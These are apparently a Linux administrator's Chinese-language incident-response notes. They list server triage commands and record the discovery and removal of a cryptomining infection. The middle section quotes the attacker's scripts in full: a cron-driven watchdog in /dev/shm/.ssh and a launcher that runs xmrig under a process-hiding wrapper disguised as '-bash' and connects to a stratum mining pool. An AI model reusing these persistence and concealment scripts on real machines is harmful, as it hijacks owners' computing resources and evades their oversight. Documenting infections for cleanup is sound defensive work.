服务器排查
命令参考了https://blog.csdn.net/cyan_grey/article/details/79901685
# 查看登录信息
vim /var/log/auth.log # 登录日志,可以查看到尝试登陆的用户名和ip等信息
last -f /var/log/btmp # 记录所有失败的登陆日志
last -u <userName>
last -f /var/log/wtmp # 登陆Ip,登陆时长
# 当前谁在线等信息
w
users
# 查看所有用户
vim /etc/passwd
history # 操作历史,登陆用户查看这个用户的操作历史
# 查看运行的进程
pstree -a
ps aux
# 查看网络情况
netstat -ntulp
# CPU和内存情况
free -m
uptime
top
htop
for user in $(cat /etc/passwd | cut -f1 -d:); do crontab -l -u $user; done # 查看每个用户的定时任务
# 系统日志和内核消息
$ dmesg
$ less /var/log/messages
$ less /var/log/secure
$ less /var/log/auth
服务器负载太高,top命令查出异常进程ld-linux-x86_64,怀疑是挖矿木马作祟,
Tasks: 148 total, 2 running, 146 sleeping, 0 stopped, 0 zombie
%Cpu(s): 99.7 us, 0.3 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 32949020 total, 12146052 used, 20802968 free, 188664 buffers
KiB Swap: 7812092 total, 0 used, 7812092 free. 1615040 cached Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
30054 wocloud 20 0 9993904 8.809g 2632 S 333.0 28.0 102585:34 ld-linux-x86-64
11 root 20 0 0 0 0 S 0.3 0.0 8:14.07 rcuos/3
# 扫描出有异常定时任务
* * * * * /dev/shm/.ssh/upd >/dev/null 2>&1
# 进入相应用户删除异常定时任务
# 进入可疑文件目录/dev/shm/.ssh
vim /dev/shm/.ssh/upd
#!/bin/sh
# 保持进程存在的脚本
if test -r /dev/shm/.ssh/bash.pid; then # 如果bash.pid文件存在且可读,
pid=$(cat /dev/shm/.ssh/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)# -CHLD? >/dev/null 2>&1,将输出全部丢弃
then
sleep 1
else
cd /dev/shm/.ssh
./run &>/dev/null # 执行run脚本,并将输出丢弃
exit 0
fi
fi
#!/bin/bash
# 查看run脚本
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://ip:3333 地址 -p x >>/dev/null & # 此ip是一个马来西亚ip,3333端口也几乎证明安装了xmrig-proxy,可以确定就是挖矿的了
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmrig >>/dev/null & # 执行ld-linux-x86-64进程,然而环境变量指向的是xmrig这个挖矿木马
fi
echo $! > bash.pid
# 主要就是这些脚本
# clamav查杀病毒
clamscan -r / --move=/tmp
----------- SCAN SUMMARY -----------
Known viruses: 6165915
Engine version: 0.100.3
Scanned directories: 14709
Scanned files: 43249
Infected files: 6
Total errors: 16439
Data scanned: 1287.82 MB
Data read: 1496.12 MB (ratio 0.86:1)
Time: 1143.508 sec (19 m 3 s)
root@ubuntu:~# ll /tmp/
ls: 初始化月份字符串出错
总用量 13904
drwxrwxrwt 2 root root 4096 7▒▒ 4 16:07 ./
drwxr-xr-x 22 root root 4096 4▒▒ 24 2014 ../
-rw------- 1 root root 838583 7▒▒ 4 15:57 h64
-rw------- 1 root root 2735648 7▒▒ 4 15:57 libxmrstak_opencl_backend.so
-rwxr-xr-x 1 root root 2821872 3▒▒ 9 06:12 x.001*
-rw------- 1 root root 5200240 7▒▒ 4 15:57 xmrig
-rw------- 1 root root 2627088 7▒▒ 4 15:57 xmrig-notls
# 随后可疑进程不再出现,至于这台服务器的安全性还需要再进一步评估
